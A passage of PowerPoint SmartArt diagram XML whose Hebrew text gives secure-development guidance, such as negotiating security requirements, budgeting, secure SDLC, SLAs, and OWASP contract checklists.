            </a:rPr>
            <a:t>תפעול ובקרת שינויים</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AEE799B-7F35-4AE2-93E2-335733E35922}" type="sibTrans" cxnId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" type="parTrans" cxnId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6DAFF3D-F53B-4057-B86C-301764638F6C}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>איספו ונהלו מו"מ לגבי הדרישות העסקיות עבור היישום עם גורמים עסקיים, לרבות דרישות להגנה בהקשר של חיסיון, אימות, אמינות וזמינות נכסי המידע והלוגיקה העסקית הרצויה.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74B7692A-6779-4DCD-9AEF-02259D2D1541}" type="parTrans" cxnId="{9D006552-01D0-4D0D-8849-67D6A60AC2DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8B800DB2-A224-446C-B691-953D1C2CF820}" type="sibTrans" cxnId="{9D006552-01D0-4D0D-8849-67D6A60AC2DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B01638C1-786F-496F-A0B5-C410B108826A}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>לקטו את הדרישות הטכניות לרבות בדיקות אבטחת מידע פונקציונאליות ולא-פונקציונאליות.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43694437-CD3E-4284-9D44-1593B764192C}" type="parTrans" cxnId="{09C32F7C-515B-404D-8AE3-B2490E7E364C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2609C602-4F2A-4BD0-B793-B9A8F7528A0D}" type="sibTrans" cxnId="{09C32F7C-515B-404D-8AE3-B2490E7E364C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D670E8F6-7F10-4194-8D30-D61874D6F76A}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>תכננו ונהלו מו"מ על התקציב כך שיכסה את כל היבטי התכנון, הפיתוח, הבדיקות והתפעול, לרבות פעילויות אבטחת מידע.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E81A2F3F-8D70-4903-B16B-987B6C58184C}" type="parTrans" cxnId="{19BA56A2-7C3E-4DCE-9854-553C5E3B6654}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{561F24C6-1615-4771-B171-0D0E427A30E3}" type="sibTrans" cxnId="{19BA56A2-7C3E-4DCE-9854-553C5E3B6654}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BE0F412C-1F25-405D-9012-BD962314F66B}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>נהלו מו"מ לגבי הדרישות ביחד עם מפתחים פנימיים וחיצוניים, לרבות הנחית ודרישות אבטחת מידע בהקשר של תוכנית אבטחת המידע של הארגון, לדוגמת תהליך פיתוח מאובטח (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>SDLC</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>) והמלצות (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>best practices</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FA61317-3892-47DC-B0EE-62F2C533F9DD}" type="parTrans" cxnId="{E9EC6A30-4489-4B6A-A94D-A9DCE2E8D735}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F802C31-EB36-4D59-A6BE-5ACF1D0D5EE1}" type="sibTrans" cxnId="{E9EC6A30-4489-4B6A-A94D-A9DCE2E8D735}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15186F95-C6C1-458B-9031-6EF842D4A213}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>דרגו את ההגשמה של כל הדרישות הטכניות, לרבות שלבי התכנון והעיצוב של המערכת.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7CCF24B-E5CD-473F-9C5E-67EE8845BD6B}" type="parTrans" cxnId="{7CE4E7FE-EFD0-4B8D-8739-883D5CBEB450}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C238568F-F796-433F-972D-AB95BE61076F}" type="sibTrans" cxnId="{7CE4E7FE-EFD0-4B8D-8739-883D5CBEB450}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7FD5BE7-3738-4FEB-A819-859729872211}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>נהלו מו"מ לגבי כל הדרישות הטכניות, לרבות תכנון, אבטחת מידע והתחייבות לרמת שירות (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>SLA</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10D48A66-1AD3-4861-AE2C-FE7121649969}" type="parTrans" cxnId="{55AC36BA-02A7-4176-AC35-3790F2AC6D1A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A36C31A-F648-44CE-A2E4-FF29AE00FE75}" type="sibTrans" cxnId="{55AC36BA-02A7-4176-AC35-3790F2AC6D1A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1B2D3447-5350-4927-A312-D529CBC4E037}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>אמצו שימוש בתבניות וברשימות (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>checklists</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>), כגון </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>OWASP Secure Software Contract Annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t/>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="he-IL" sz="900" b="1" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>שימו לב</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>: הנספח (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>) מיועד לחוזים הנוגעים לחוק האמריקאי, לכן אנא פנו ליועץ משפטי מוסמך לפני השימוש בנספח זה.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F53887AC-B941-4AAB-8FEA-FB9B951AF11A}" type="parTrans" cxnId="{6F606730-CF92-4BAD-B450-96CD97EFD0C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C442963-DBE0-4F04-BD90-C24B340C3F06}" type="sibTrans" cxnId="{6F606730-CF92-4BAD-B450-96CD97EFD0C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6576E723-D1D2-4498-9F2B-A16D2BBF8839}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>נהלו מו"מ לגבי התכנון והעיצוב של המערכת עם המפתחים ובעלי עניין פנימיים, כגון מומחי אבטחת מידע.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7888A72E-BD5D-435C-A8C3-A6A740C6C8CE}" type="parTrans" cxnId="{34133C1F-7903-440B-98B1-E71794824CA4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66761DA8-E0AB-4FD1-8E42-5077460AE43C}" type="sibTrans" cxnId="{34133C1F-7903-440B-98B1-E71794824CA4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23BB7F4B-501F-4A69-AC88-1F19C32E05A8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>הגדירו את הארכיטקטורה בהיבטי אבטחת מידע, בקרות ופעולות הפחתה מתאימות להגנה הנדרשת ולרמת הסיכון המצופה. הדבר חייב להיות בהסכמת מומחי אבטחת מידע.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7CCEB1B-95A1-4C7B-89D0-2745C2BAD436}" type="parTrans" cxnId="{03299219-6141-42EC-AEE2-B604B6E8E9D6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71EF5FAE-179B-4379-9C0E-925F8BF7892B}" type="sibTrans" cxnId="{03299219-6141-42EC-AEE2-B604B6E8E9D6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
